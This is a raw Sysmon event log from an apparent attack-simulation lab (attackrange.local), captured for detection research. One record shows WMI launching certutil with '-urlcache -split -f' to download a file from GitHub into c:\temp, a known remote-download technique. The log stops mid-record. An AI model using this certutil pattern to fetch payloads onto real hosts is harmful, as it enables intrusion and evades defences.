21:50:35.067{896A638B-B3F6-605B-7769-00000000AE01}51966688C:\Windows\system32\wbem\wmiprvse.exe{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000005918016Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:35.067{896A638B-B42B-605B-8D69-00000000AE01}5360C:\Windows\System32\certutil.exe10.0.14393.4169 (rs1_release.210107-1130)CertUtil.exeMicrosoft® Windows® Operating SystemMicrosoft CorporationCertUtil.exe"C:\Windows\System32\certutil.exe" ―urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt c:\temp\foo.txtC:\Windows\system32\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=BF7CEA72AE186A10239F830F93492A73,SHA256=A50DFE408565C2BB011D013AC43E616B2A595B1D06EB9B083F519672732498DA,IMPHASH=442218E88D4D6AA0BE3165DD7B20A4C4{896A638B-B3F6-605B-7769-00000000AE01}5196C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000005918054Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918053Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918052Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.228{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=07353C8D2E7403290EE9E20E088F4C4F,SHA256=780CE59F702EB92F5E28712953A9A42077A86B324592ED0265793352723DD294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918051Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.228{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EDA129A1C6C514BDC801CC7BB3F6EC58,SHA256=AB1B3B5F7AF36D682AF136FE136F084B2050F31CD8606E28CF6CEE786431131F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918050Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.227{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9E1E08A8FE5CCE320B1982FD9B6EAD3,SHA256=27446E8031741444D9219F20FD46FFAF44E51B3FF588F00F172D9D212F169BF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638636Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:36.178{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F6BBBC993B1AD475569E4BF67055D7F8,SHA256=52F676D1F3AEABB66561053D836505CC833962E876462566FBE436DB87172D59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918057Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:37.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918056Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:37.742{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918055Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:37.278{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9138CDD8B263F40BE1EB91704BDFBA6D,SHA256=724AC8C2AA90E3E974D54A2BCAF6C9C4494DCF6587B9C6CDD514EE56550C6043,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638637Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:37.194{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30EC08FCDB2727DA9C2A602CAC325644,SHA256=664B695A73A11C8DB5F4A702C0C8570E9A8627255B424EC307A280EE0912F829,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000638641Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:34.349{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57263-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638640Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:38.210{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDE9C505AD3FB7973DFB4588FF345B01,SHA256=CE10E5CCBA52CF185817BA4AFA402DD0EE9A6E60893BA60DBE2EB3141F6C2CE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918060Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:38.743{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918059Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:38.743{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918058Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:38.293{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79F808E8CEE33014D8F3B109053E0FD6,SHA256=429781BCE340032F3A38D0D092DB8F87006D5DEAB12AA7209CD0D2E4F11EA590,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638639Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:38.069{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AD30367CC1D5F2B3943D757BD0317520,SHA256=9C0C42DDA671099462AE879A3316E98F37A1D8978630F6500A17539F4663E8D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638638Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:38.069{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2860D4376F9A071F9B9BCFB322353C19,SHA256=5E24A9597250645313508A9A65F257A648BC12DB97D5F4AFC334E6B1A1235FB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638643Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:39.475{BFB545BB-B866-6058-1200-00000000AF01}1068NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=977F9DECACC7F5F53FA14BD1F33A007E,SHA256=77320720FA5AA4D26B7A79CF6D2EB296AB372A1C6839C0E8DC6AA43FB3999474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638642Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:39.225{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156E4E47AF2CBF36F277F2C268F3EF6D,SHA256=2E4ADEE72C9C0DA03AFF97203E9575A0563E4900FDDAE3234EBE4EA720EF87D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918064Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:39.743{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918063Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:39.743{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918062Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:39.316{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA71E36D18BB6E862B4B108BA8CF2399,SHA256=E5A74E73D72891CB70BF58CBE6177B8CF884640BFDE815F4E5BD4CDE06CE9D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005918061Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:39.212{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CADACCDE25E09A3F7CDA7A3BC93F25F8,SHA256=D701C19EE27FD496DF06597154F161925C9B36E371D864801367F2B112C84CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638644Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:40.241{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C6ABE27A33315C9DE7413501E75AB0B,SHA256=525D3BB3D1833DFC3E581AD3BFF8720904B68293F6639D269AE9FA1107411119,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918068Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:40.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918067Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:40.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005918066Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:36.888{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1523-false10.0.1.12-8000- 23542300x80000000000000005918065Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:40.328{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8DE024327F84A42F144CBF222418CB3,SHA256=D38BE6600815108BAA4C6772A166255481AE26CDE6B5C28CC87F744704ED07DC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918071Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918070Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.744{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918069Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:41.365{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D2206F148BC5B33447B593044812EC3,SHA256=81D8F7A3F75BFAC2421F9EA9EC5C721E114D918FDC31C12502D14DA1A9750FB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638645Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:41.256{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D4A3F4D1AE43816B703AE97759912D5,SHA256=1AC660A4215112F1A63D2FB13941223AB3E0FA7813DB7E655A4089FABF325994,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638646Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:42.272{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC9CCBE946199E84C195AB807954D4FA,SHA256=683BD47C4C3F86F86159CBE2299F98193435C40CD65663A4F91BE4C218486B53,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918113Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.828{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918112Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.828{896A638B-B8E2-6058-B102-00000000AE01}4244476C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918111Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.822{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918110Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.822{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918109Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.822{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000005918108Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:42.819{896A638B-B432-605B-8F69-00000000AE01}7868C:\Windows\System32\certutil.exeC:\Temp\foo.txt2021-03-24 21:50:19.932 23542300x80000000000000005918107Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 